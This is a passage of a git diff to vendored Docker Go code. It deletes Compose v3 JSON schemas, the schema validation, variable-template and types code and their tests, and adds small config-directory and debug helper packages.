"additionalProperties": false - }, - - "healthcheck": { - "id": "#/definitions/healthcheck", - "type": "object", - "additionalProperties": false, - "properties": { - "disable": {"type": "boolean"}, - "interval": {"type": "string"}, - "retries": {"type": "number"}, - "test": { - "oneOf": 
[ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "timeout": {"type": "string"} - } - }, - "deployment": { - "id": "#/definitions/deployment", - "type": ["object", "null"], - "properties": { - "mode": {"type": "string"}, - "replicas": {"type": "integer"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "update_config": { - "type": "object", - "properties": { - "parallelism": {"type": "integer"}, - "delay": {"type": "string", "format": "duration"}, - "failure_action": {"type": "string"}, - "monitor": {"type": "string", "format": "duration"}, - "max_failure_ratio": {"type": "number"} - }, - "additionalProperties": false - }, - "resources": { - "type": "object", - "properties": { - "limits": {"$ref": "#/definitions/resource"}, - "reservations": {"$ref": "#/definitions/resource"} - } - }, - "restart_policy": { - "type": "object", - "properties": { - "condition": {"type": "string"}, - "delay": {"type": "string", "format": "duration"}, - "max_attempts": {"type": "integer"}, - "window": {"type": "string", "format": "duration"} - }, - "additionalProperties": false - }, - "placement": { - "type": "object", - "properties": { - "constraints": {"type": "array", "items": {"type": "string"}} - }, - "additionalProperties": false - } - }, - "additionalProperties": false - }, - - "resource": { - "id": "#/definitions/resource", - "type": "object", - "properties": { - "cpus": {"type": "string"}, - "memory": {"type": "string"} - }, - "additionalProperties": false - }, - - "network": { - "id": "#/definitions/network", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "ipam": { - "type": "object", - "properties": { - "driver": {"type": "string"}, - "config": { - "type": "array", - "items": { - "type": "object", - "properties": { - "subnet": {"type": "string"} - }, - "additionalProperties": false - } - } 
- }, - "additionalProperties": false - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "internal": {"type": "boolean"}, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "volume": { - "id": "#/definitions/volume", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "string_or_list": { - "oneOf": [ - {"type": "string"}, - {"$ref": "#/definitions/list_of_strings"} - ] - }, - - "list_of_strings": { - "type": "array", - "items": {"type": "string"}, - "uniqueItems": true - }, - - "list_or_dict": { - "oneOf": [ - { - "type": "object", - "patternProperties": { - ".+": { - "type": ["string", "number", "null"] - } - }, - "additionalProperties": false - }, - {"type": "array", "items": {"type": "string"}, "uniqueItems": true} - ] - }, - - "constraints": { - "service": { - "id": "#/definitions/constraints/service", - "anyOf": [ - {"required": ["build"]}, - {"required": ["image"]} - ], - "properties": { - "build": { - "required": ["context"] - } - } - } - } - } -} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json deleted file mode 100644 index b7037485f9..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json +++ /dev/null @@ -1,428 +0,0 @@ -{ - "$schema": "http://json-schema.org/draft-04/schema#", - "id": "config_schema_v3.1.json", - "type": "object", - "required": ["version"], - - "properties": { - 
"version": { - "type": "string" - }, - - "services": { - "id": "#/properties/services", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/service" - } - }, - "additionalProperties": false - }, - - "networks": { - "id": "#/properties/networks", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/network" - } - } - }, - - "volumes": { - "id": "#/properties/volumes", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/volume" - } - }, - "additionalProperties": false - }, - - "secrets": { - "id": "#/properties/secrets", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/secret" - } - }, - "additionalProperties": false - } - }, - - "additionalProperties": false, - - "definitions": { - - "service": { - "id": "#/definitions/service", - "type": "object", - - "properties": { - "deploy": {"$ref": "#/definitions/deployment"}, - "build": { - "oneOf": [ - {"type": "string"}, - { - "type": "object", - "properties": { - "context": {"type": "string"}, - "dockerfile": {"type": "string"}, - "args": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - } - ] - }, - "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cgroup_parent": {"type": "string"}, - "command": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "container_name": {"type": "string"}, - "depends_on": {"$ref": "#/definitions/list_of_strings"}, - "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "dns": {"$ref": "#/definitions/string_or_list"}, - "dns_search": {"$ref": "#/definitions/string_or_list"}, - "domainname": {"type": "string"}, - "entrypoint": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} 
- ] - }, - "env_file": {"$ref": "#/definitions/string_or_list"}, - "environment": {"$ref": "#/definitions/list_or_dict"}, - - "expose": { - "type": "array", - "items": { - "type": ["string", "number"], - "format": "expose" - }, - "uniqueItems": true - }, - - "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, - "healthcheck": {"$ref": "#/definitions/healthcheck"}, - "hostname": {"type": "string"}, - "image": {"type": "string"}, - "ipc": {"type": "string"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - - "logging": { - "type": "object", - - "properties": { - "driver": {"type": "string"}, - "options": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number", "null"]} - } - } - }, - "additionalProperties": false - }, - - "mac_address": {"type": "string"}, - "network_mode": {"type": "string"}, - - "networks": { - "oneOf": [ - {"$ref": "#/definitions/list_of_strings"}, - { - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "oneOf": [ - { - "type": "object", - "properties": { - "aliases": {"$ref": "#/definitions/list_of_strings"}, - "ipv4_address": {"type": "string"}, - "ipv6_address": {"type": "string"} - }, - "additionalProperties": false - }, - {"type": "null"} - ] - } - }, - "additionalProperties": false - } - ] - }, - "pid": {"type": ["string", "null"]}, - - "ports": { - "type": "array", - "items": { - "type": ["string", "number"], - "format": "ports" - }, - "uniqueItems": true - }, - - "privileged": {"type": "boolean"}, - "read_only": {"type": "boolean"}, - "restart": {"type": "string"}, - "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "shm_size": {"type": ["number", "string"]}, - "secrets": { - "type": "array", - "items": { - "oneOf": [ - {"type": "string"}, - { - "type": "object", - "properties": { 
- "source": {"type": "string"}, - "target": {"type": "string"}, - "uid": {"type": "string"}, - "gid": {"type": "string"}, - "mode": {"type": "number"} - } - } - ] - } - }, - "sysctls": {"$ref": "#/definitions/list_or_dict"}, - "stdin_open": {"type": "boolean"}, - "stop_grace_period": {"type": "string", "format": "duration"}, - "stop_signal": {"type": "string"}, - "tmpfs": {"$ref": "#/definitions/string_or_list"}, - "tty": {"type": "boolean"}, - "ulimits": { - "type": "object", - "patternProperties": { - "^[a-z]+$": { - "oneOf": [ - {"type": "integer"}, - { - "type":"object", - "properties": { - "hard": {"type": "integer"}, - "soft": {"type": "integer"} - }, - "required": ["soft", "hard"], - "additionalProperties": false - } - ] - } - } - }, - "user": {"type": "string"}, - "userns_mode": {"type": "string"}, - "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "working_dir": {"type": "string"} - }, - "additionalProperties": false - }, - - "healthcheck": { - "id": "#/definitions/healthcheck", - "type": "object", - "additionalProperties": false, - "properties": { - "disable": {"type": "boolean"}, - "interval": {"type": "string"}, - "retries": {"type": "number"}, - "test": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "timeout": {"type": "string"} - } - }, - "deployment": { - "id": "#/definitions/deployment", - "type": ["object", "null"], - "properties": { - "mode": {"type": "string"}, - "replicas": {"type": "integer"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "update_config": { - "type": "object", - "properties": { - "parallelism": {"type": "integer"}, - "delay": {"type": "string", "format": "duration"}, - "failure_action": {"type": "string"}, - "monitor": {"type": "string", "format": "duration"}, - "max_failure_ratio": {"type": "number"} - }, - "additionalProperties": false - }, - "resources": { - "type": "object", - "properties": { - "limits": {"$ref": 
"#/definitions/resource"}, - "reservations": {"$ref": "#/definitions/resource"} - } - }, - "restart_policy": { - "type": "object", - "properties": { - "condition": {"type": "string"}, - "delay": {"type": "string", "format": "duration"}, - "max_attempts": {"type": "integer"}, - "window": {"type": "string", "format": "duration"} - }, - "additionalProperties": false - }, - "placement": { - "type": "object", - "properties": { - "constraints": {"type": "array", "items": {"type": "string"}} - }, - "additionalProperties": false - } - }, - "additionalProperties": false - }, - - "resource": { - "id": "#/definitions/resource", - "type": "object", - "properties": { - "cpus": {"type": "string"}, - "memory": {"type": "string"} - }, - "additionalProperties": false - }, - - "network": { - "id": "#/definitions/network", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "ipam": { - "type": "object", - "properties": { - "driver": {"type": "string"}, - "config": { - "type": "array", - "items": { - "type": "object", - "properties": { - "subnet": {"type": "string"} - }, - "additionalProperties": false - } - } - }, - "additionalProperties": false - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "internal": {"type": "boolean"}, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "volume": { - "id": "#/definitions/volume", - "type": ["object", "null"], - "properties": { - "driver": {"type": "string"}, - "driver_opts": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number"]} - } - }, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - }, - "additionalProperties": false - }, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - 
"additionalProperties": false - }, - - "secret": { - "id": "#/definitions/secret", - "type": "object", - "properties": { - "file": {"type": "string"}, - "external": { - "type": ["boolean", "object"], - "properties": { - "name": {"type": "string"} - } - }, - "labels": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - }, - - "string_or_list": { - "oneOf": [ - {"type": "string"}, - {"$ref": "#/definitions/list_of_strings"} - ] - }, - - "list_of_strings": { - "type": "array", - "items": {"type": "string"}, - "uniqueItems": true - }, - - "list_or_dict": { - "oneOf": [ - { - "type": "object", - "patternProperties": { - ".+": { - "type": ["string", "number", "null"] - } - }, - "additionalProperties": false - }, - {"type": "array", "items": {"type": "string"}, "uniqueItems": true} - ] - }, - - "constraints": { - "service": { - "id": "#/definitions/constraints/service", - "anyOf": [ - {"required": ["build"]}, - {"required": ["image"]} - ], - "properties": { - "build": { - "required": ["context"] - } - } - } - } - } -} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema.go b/vendor/github.com/docker/docker/cli/compose/schema/schema.go deleted file mode 100644 index ae33c77fbe..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/schema.go +++ /dev/null @@ -1,137 +0,0 @@ -package schema - -//go:generate go-bindata -pkg schema -nometadata data - -import ( - "fmt" - "strings" - "time" - - "github.com/pkg/errors" - "github.com/xeipuuv/gojsonschema" -) - -const ( - defaultVersion = "1.0" - versionField = "version" -) - -type portsFormatChecker struct{} - -func (checker portsFormatChecker) IsFormat(input string) bool { - // TODO: implement this - return true -} - -type durationFormatChecker struct{} - -func (checker durationFormatChecker) IsFormat(input string) bool { - _, err := time.ParseDuration(input) - return err == nil -} - -func init() { - gojsonschema.FormatCheckers.Add("expose", portsFormatChecker{}) - 
gojsonschema.FormatCheckers.Add("ports", portsFormatChecker{}) - gojsonschema.FormatCheckers.Add("duration", durationFormatChecker{}) -} - -// Version returns the version of the config, defaulting to version 1.0 -func Version(config map[string]interface{}) string { - version, ok := config[versionField] - if !ok { - return defaultVersion - } - return normalizeVersion(fmt.Sprintf("%v", version)) -} - -func normalizeVersion(version string) string { - switch version { - case "3": - return "3.0" - default: - return version - } -} - -// Validate uses the jsonschema to validate the configuration -func Validate(config map[string]interface{}, version string) error { - schemaData, err := Asset(fmt.Sprintf("data/config_schema_v%s.json", version)) - if err != nil { - return errors.Errorf("unsupported Compose file version: %s", version) - } - - schemaLoader := gojsonschema.NewStringLoader(string(schemaData)) - dataLoader := gojsonschema.NewGoLoader(config) - - result, err := gojsonschema.Validate(schemaLoader, dataLoader) - if err != nil { - return err - } - - if !result.Valid() { - return toError(result) - } - - return nil -} - -func toError(result *gojsonschema.Result) error { - err := getMostSpecificError(result.Errors()) - description := getDescription(err) - return fmt.Errorf("%s %s", err.Field(), description) -} - -func getDescription(err gojsonschema.ResultError) string { - if err.Type() == "invalid_type" { - if expectedType, ok := err.Details()["expected"].(string); ok { - return fmt.Sprintf("must be a %s", humanReadableType(expectedType)) - } - } - - return err.Description() -} - -func humanReadableType(definition string) string { - if definition[0:1] == "[" { - allTypes := strings.Split(definition[1:len(definition)-1], ",") - for i, t := range allTypes { - allTypes[i] = humanReadableType(t) - } - return fmt.Sprintf( - "%s or %s", - strings.Join(allTypes[0:len(allTypes)-1], ", "), - allTypes[len(allTypes)-1], - ) - } - if definition == "object" { - return "mapping" - } 
- if definition == "array" { - return "list" - } - return definition -} - -func getMostSpecificError(errors []gojsonschema.ResultError) gojsonschema.ResultError { - var mostSpecificError gojsonschema.ResultError - - for _, err := range errors { - if mostSpecificError == nil { - mostSpecificError = err - } else if specificity(err) > specificity(mostSpecificError) { - mostSpecificError = err - } else if specificity(err) == specificity(mostSpecificError) { - // Invalid type errors win in a tie-breaker for most specific field name - if err.Type() == "invalid_type" && mostSpecificError.Type() != "invalid_type" { - mostSpecificError = err - } - } - } - - return mostSpecificError -} - -func specificity(err gojsonschema.ResultError) int { - return len(strings.Split(err.Field(), ".")) -} diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go deleted file mode 100644 index 0935d4022e..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go +++ /dev/null @@ -1,52 +0,0 @@ -package schema - -import ( - "testing" - - "github.com/stretchr/testify/assert" -) - -type dict map[string]interface{} - -func TestValidate(t *testing.T) { - config := dict{ - "version": "3.0", - "services": dict{ - "foo": dict{ - "image": "busybox", - }, - }, - } - - assert.NoError(t, Validate(config, "3.0")) -} - -func TestValidateUndefinedTopLevelOption(t *testing.T) { - config := dict{ - "version": "3.0", - "helicopters": dict{ - "foo": dict{ - "image": "busybox", - }, - }, - } - - err := Validate(config, "3.0") - assert.Error(t, err) - assert.Contains(t, err.Error(), "Additional property helicopters is not allowed") -} - -func TestValidateInvalidVersion(t *testing.T) { - config := dict{ - "version": "2.1", - "services": dict{ - "foo": dict{ - "image": "busybox", - }, - }, - } - - err := Validate(config, "2.1") - assert.Error(t, err) - assert.Contains(t, err.Error(), "unsupported Compose 
file version: 2.1") -} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template.go b/vendor/github.com/docker/docker/cli/compose/template/template.go deleted file mode 100644 index 28495baf50..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/template/template.go +++ /dev/null @@ -1,100 +0,0 @@ -package template - -import ( - "fmt" - "regexp" - "strings" -) - -var delimiter = "\\$" -var substitution = "[_a-z][_a-z0-9]*(?::?-[^}]+)?" - -var patternString = fmt.Sprintf( - "%s(?i:(?P%s)|(?P%s)|{(?P%s)}|(?P))", - delimiter, delimiter, substitution, substitution, -) - -var pattern = regexp.MustCompile(patternString) - -// InvalidTemplateError is returned when a variable template is not in a valid -// format -type InvalidTemplateError struct { - Template string -} - -func (e InvalidTemplateError) Error() string { - return fmt.Sprintf("Invalid template: %#v", e.Template) -} - -// Mapping is a user-supplied function which maps from variable names to values. -// Returns the value as a string and a bool indicating whether -// the value is present, to distinguish between an empty string -// and the absence of a value. 
-type Mapping func(string) (string, bool) - -// Substitute variables in the string with their values -func Substitute(template string, mapping Mapping) (result string, err *InvalidTemplateError) { - result = pattern.ReplaceAllStringFunc(template, func(substring string) string { - matches := pattern.FindStringSubmatch(substring) - groups := make(map[string]string) - for i, name := range pattern.SubexpNames() { - if i != 0 { - groups[name] = matches[i] - } - } - - substitution := groups["named"] - if substitution == "" { - substitution = groups["braced"] - } - if substitution != "" { - // Soft default (fall back if unset or empty) - if strings.Contains(substitution, ":-") { - name, defaultValue := partition(substitution, ":-") - value, ok := mapping(name) - if !ok || value == "" { - return defaultValue - } - return value - } - - // Hard default (fall back if-and-only-if empty) - if strings.Contains(substitution, "-") { - name, defaultValue := partition(substitution, "-") - value, ok := mapping(name) - if !ok { - return defaultValue - } - return value - } - - // No default (fall back to empty string) - value, ok := mapping(substitution) - if !ok { - return "" - } - return value - } - - if escaped := groups["escaped"]; escaped != "" { - return escaped - } - - err = &InvalidTemplateError{Template: template} - return "" - }) - - return result, err -} - -// Split the string at the first occurrence of sep, and return the part before the separator, -// and the part after the separator. -// -// If the separator is not found, return the string itself, followed by an empty string. 
-func partition(s, sep string) (string, string) { - if strings.Contains(s, sep) { - parts := strings.SplitN(s, sep, 2) - return parts[0], parts[1] - } - return s, "" -} diff --git a/vendor/github.com/docker/docker/cli/compose/template/template_test.go b/vendor/github.com/docker/docker/cli/compose/template/template_test.go deleted file mode 100644 index 6b81bf0a39..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/template/template_test.go +++ /dev/null @@ -1,83 +0,0 @@ -package template - -import ( - "testing" - - "github.com/stretchr/testify/assert" -) - -var defaults = map[string]string{ - "FOO": "first", - "BAR": "", -} - -func defaultMapping(name string) (string, bool) { - val, ok := defaults[name] - return val, ok -} - -func TestEscaped(t *testing.T) { - result, err := Substitute("$${foo}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "${foo}", result) -} - -func TestInvalid(t *testing.T) { - invalidTemplates := []string{ - "${", - "$}", - "${}", - "${ }", - "${ foo}", - "${foo }", - "${foo!}", - } - - for _, template := range invalidTemplates { - _, err := Substitute(template, defaultMapping) - assert.Error(t, err) - assert.IsType(t, &InvalidTemplateError{}, err) - } -} - -func TestNoValueNoDefault(t *testing.T) { - for _, template := range []string{"This ${missing} var", "This ${BAR} var"} { - result, err := Substitute(template, defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "This var", result) - } -} - -func TestValueNoDefault(t *testing.T) { - for _, template := range []string{"This $FOO var", "This ${FOO} var"} { - result, err := Substitute(template, defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "This first var", result) - } -} - -func TestNoValueWithDefault(t *testing.T) { - for _, template := range []string{"ok ${missing:-def}", "ok ${missing-def}"} { - result, err := Substitute(template, defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok def", result) - } -} - -func 
TestEmptyValueWithSoftDefault(t *testing.T) { - result, err := Substitute("ok ${BAR:-def}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok def", result) -} - -func TestEmptyValueWithHardDefault(t *testing.T) { - result, err := Substitute("ok ${BAR-def}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok ", result) -} - -func TestNonAlphanumericDefault(t *testing.T) { - result, err := Substitute("ok ${BAR:-/non:-alphanumeric}", defaultMapping) - assert.NoError(t, err) - assert.Equal(t, "ok /non:-alphanumeric", result) -} diff --git a/vendor/github.com/docker/docker/cli/compose/types/types.go b/vendor/github.com/docker/docker/cli/compose/types/types.go deleted file mode 100644 index cae7b4af26..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/types/types.go +++ /dev/null @@ -1,253 +0,0 @@ -package types - -import ( - "time" -) - -// UnsupportedProperties not yet supported by this implementation of the compose file -var UnsupportedProperties = []string{ - "build", - "cap_add", - "cap_drop", - "cgroup_parent", - "devices", - "dns", - "dns_search", - "domainname", - "external_links", - "ipc", - "links", - "mac_address", - "network_mode", - "privileged", - "read_only", - "restart", - "security_opt", - "shm_size", - "stop_signal", - "sysctls", - "tmpfs", - "userns_mode", -} - -// DeprecatedProperties that were removed from the v3 format, but their -// use should not impact the behaviour of the application. -var DeprecatedProperties = map[string]string{ - "container_name": "Setting the container name is not supported.", - "expose": "Exposing ports is unnecessary - services on the same network can access each other's containers on any port.", -} - -// ForbiddenProperties that are not supported in this implementation of the -// compose file. -var ForbiddenProperties = map[string]string{ - "extends": "Support for `extends` is not implemented yet. 
Use `docker-compose config` to generate a configuration with all `extends` options resolved, and deploy from that.", - "volume_driver": "Instead of setting the volume driver on the service, define a volume using the top-level `volumes` option and specify the driver there.", - "volumes_from": "To share a volume between services, define it using the top-level `volumes` option and reference it from each service that shares it using the service-level `volumes` option.", - "cpu_quota": "Set resource limits using deploy.resources", - "cpu_shares": "Set resource limits using deploy.resources", - "cpuset": "Set resource limits using deploy.resources", - "mem_limit": "Set resource limits using deploy.resources", - "memswap_limit": "Set resource limits using deploy.resources", -} - -// Dict is a mapping of strings to interface{} -type Dict map[string]interface{} - -// ConfigFile is a filename and the contents of the file as a Dict -type ConfigFile struct { - Filename string - Config Dict -} - -// ConfigDetails are the details about a group of ConfigFiles -type ConfigDetails struct { - WorkingDir string - ConfigFiles []ConfigFile - Environment map[string]string -} - -// Config is a full compose file configuration -type Config struct { - Services []ServiceConfig - Networks map[string]NetworkConfig - Volumes map[string]VolumeConfig - Secrets map[string]SecretConfig -} - -// ServiceConfig is the configuration of one service -type ServiceConfig struct { - Name string - - CapAdd []string `mapstructure:"cap_add"` - CapDrop []string `mapstructure:"cap_drop"` - CgroupParent string `mapstructure:"cgroup_parent"` - Command []string `compose:"shell_command"` - ContainerName string `mapstructure:"container_name"` - DependsOn []string `mapstructure:"depends_on"` - Deploy DeployConfig - Devices []string - DNS []string `compose:"string_or_list"` - DNSSearch []string `mapstructure:"dns_search" compose:"string_or_list"` - DomainName string `mapstructure:"domainname"` - Entrypoint []string 
`compose:"shell_command"` - Environment map[string]string `compose:"list_or_dict_equals"` - Expose []string `compose:"list_of_strings_or_numbers"` - ExternalLinks []string `mapstructure:"external_links"` - ExtraHosts map[string]string `mapstructure:"extra_hosts" compose:"list_or_dict_colon"` - Hostname string - HealthCheck *HealthCheckConfig - Image string - Ipc string - Labels map[string]string `compose:"list_or_dict_equals"` - Links []string - Logging *LoggingConfig - MacAddress string `mapstructure:"mac_address"` - NetworkMode string `mapstructure:"network_mode"` - Networks map[string]*ServiceNetworkConfig `compose:"list_or_struct_map"` - Pid string - Ports []string `compose:"list_of_strings_or_numbers"` - Privileged bool - ReadOnly bool `mapstructure:"read_only"` - Restart string - Secrets []ServiceSecretConfig - SecurityOpt []string `mapstructure:"security_opt"` - StdinOpen bool `mapstructure:"stdin_open"` - StopGracePeriod *time.Duration `mapstructure:"stop_grace_period"` - StopSignal string `mapstructure:"stop_signal"` - Tmpfs []string `compose:"string_or_list"` - Tty bool `mapstructure:"tty"` - Ulimits map[string]*UlimitsConfig - User string - Volumes []string - WorkingDir string `mapstructure:"working_dir"` -} - -// LoggingConfig the logging configuration for a service -type LoggingConfig struct { - Driver string - Options map[string]string -} - -// DeployConfig the deployment configuration for a service -type DeployConfig struct { - Mode string - Replicas *uint64 - Labels map[string]string `compose:"list_or_dict_equals"` - UpdateConfig *UpdateConfig `mapstructure:"update_config"` - Resources Resources - RestartPolicy *RestartPolicy `mapstructure:"restart_policy"` - Placement Placement -} - -// HealthCheckConfig the healthcheck configuration for a service -type HealthCheckConfig struct { - Test []string `compose:"healthcheck"` - Timeout string - Interval string - Retries *uint64 - Disable bool -} - -// UpdateConfig the service update configuration -type 
UpdateConfig struct { - Parallelism *uint64 - Delay time.Duration - FailureAction string `mapstructure:"failure_action"` - Monitor time.Duration - MaxFailureRatio float32 `mapstructure:"max_failure_ratio"` -} - -// Resources the resource limits and reservations -type Resources struct { - Limits *Resource - Reservations *Resource -} - -// Resource is a resource to be limited or reserved -type Resource struct { - // TODO: types to convert from units and ratios - NanoCPUs string `mapstructure:"cpus"` - MemoryBytes UnitBytes `mapstructure:"memory"` -} - -// UnitBytes is the bytes type -type UnitBytes int64 - -// RestartPolicy the service restart policy -type RestartPolicy struct { - Condition string - Delay *time.Duration - MaxAttempts *uint64 `mapstructure:"max_attempts"` - Window *time.Duration -} - -// Placement constraints for the service -type Placement struct { - Constraints []string -} - -// ServiceNetworkConfig is the network configuration for a service -type ServiceNetworkConfig struct { - Aliases []string - Ipv4Address string `mapstructure:"ipv4_address"` - Ipv6Address string `mapstructure:"ipv6_address"` -} - -// ServiceSecretConfig is the secret configuration for a service -type ServiceSecretConfig struct { - Source string - Target string - UID string - GID string - Mode uint32 -} - -// UlimitsConfig the ulimit configuration -type UlimitsConfig struct { - Single int - Soft int - Hard int -} - -// NetworkConfig for a network -type NetworkConfig struct { - Driver string - DriverOpts map[string]string `mapstructure:"driver_opts"` - Ipam IPAMConfig - External External - Internal bool - Labels map[string]string `compose:"list_or_dict_equals"` -} - -// IPAMConfig for a network -type IPAMConfig struct { - Driver string - Config []*IPAMPool -} - -// IPAMPool for a network -type IPAMPool struct { - Subnet string -} - -// VolumeConfig for a volume -type VolumeConfig struct { - Driver string - DriverOpts map[string]string `mapstructure:"driver_opts"` - External 
External - Labels map[string]string `compose:"list_or_dict_equals"` -} - -// External identifies a Volume or Network as a reference to a resource that is -// not managed, and should already exist. -type External struct { - Name string - External bool -} - -// SecretConfig for a secret -type SecretConfig struct { - File string - External External - Labels map[string]string `compose:"list_or_dict_equals"` -} diff --git a/vendor/github.com/docker/docker/cli/config/configdir.go b/vendor/github.com/docker/docker/cli/config/configdir.go new file mode 100644 index 0000000000..4bef4e104d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/config/configdir.go @@ -0,0 +1,25 @@ +package config // import "github.com/docker/docker/cli/config" + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/pkg/homedir" +) + +var ( + configDir = os.Getenv("DOCKER_CONFIG") + configFileDir = ".docker" +) + +// Dir returns the path to the configuration directory as specified by the DOCKER_CONFIG environment variable. +// TODO: this was copied from cli/config/configfile and should be removed once cmd/dockerd moves +func Dir() string { + return configDir +} + +func init() { + if configDir == "" { + configDir = filepath.Join(homedir.Get(), configFileDir) + } +} diff --git a/vendor/github.com/docker/docker/cli/debug/debug.go b/vendor/github.com/docker/docker/cli/debug/debug.go new file mode 100644 index 0000000000..2303e15c99 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/debug/debug.go @@ -0,0 +1,26 @@ +package debug // import "github.com/docker/docker/cli/debug" + +import ( + "os" + + "github.com/sirupsen/logrus" +) + +// Enable sets the DEBUG env var to true +// and makes the logger to log at debug level. +func Enable() { + os.Setenv("DEBUG", "1") + logrus.SetLevel(logrus.DebugLevel) +} + +// Disable sets the DEBUG env var to false +// and makes the logger to log at info level. 
+func Disable() { + os.Setenv("DEBUG", "") + logrus.SetLevel(logrus.InfoLevel) +} + +// IsEnabled checks whether the debug flag is set or not. +func IsEnabled() bool { + return os.Getenv("DEBUG") != "" +} diff --git a/vendor/github.com/docker/docker/utils/debug_test.go b/vendor/github.com/docker/docker/cli/debug/debug_test.go similarity index 71% rename from vendor/github.com/docker/docker/utils/debug_test.go rename to vendor/github.com/docker/docker/cli/debug/debug_test.go index 6f9c4dfbb0..5b6d788a39 100644 --- a/vendor/github.com/docker/docker/utils/debug_test.go +++ b/vendor/github.com/docker/docker/cli/debug/debug_test.go @@ -1,18 +1,18 @@ -package utils +package debug // import "github.com/docker/docker/cli/debug" import ( "os" "testing" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) -func TestEnableDebug(t *testing.T) { +func TestEnable(t *testing.T) { defer func() { os.Setenv("DEBUG", "") logrus.SetLevel(logrus.InfoLevel) }() - EnableDebug() + Enable() if os.Getenv("DEBUG") != "1" { t.Fatalf("expected DEBUG=1, got %s\n", os.Getenv("DEBUG")) } @@ -21,8 +21,8 @@ func TestEnableDebug(t *testing.T) { } } -func TestDisableDebug(t *testing.T) { - DisableDebug() +func TestDisable(t *testing.T) { + Disable() if os.Getenv("DEBUG") != "" { t.Fatalf("expected DEBUG=\"\", got %s\n", os.Getenv("DEBUG")) } @@ -31,13 +31,13 @@ func TestDisableDebug(t *testing.T) { } } -func TestDebugEnabled(t *testing.T) { - EnableDebug() - if !IsDebugEnabled() { +func TestEnabled(t *testing.T) { + Enable() + if !IsEnabled() { t.Fatal("expected debug enabled, got false") } - DisableDebug() - if IsDebugEnabled() { + Disable() + if IsEnabled() { t.Fatal("expected debug disabled, got true") } } diff --git a/vendor/github.com/docker/docker/cli/error.go b/vendor/github.com/docker/docker/cli/error.go index 62f62433b8..ea7c0eb506 100644 --- a/vendor/github.com/docker/docker/cli/error.go +++ b/vendor/github.com/docker/docker/cli/error.go @@ -1,4 +1,4 @@ -package cli +package cli 
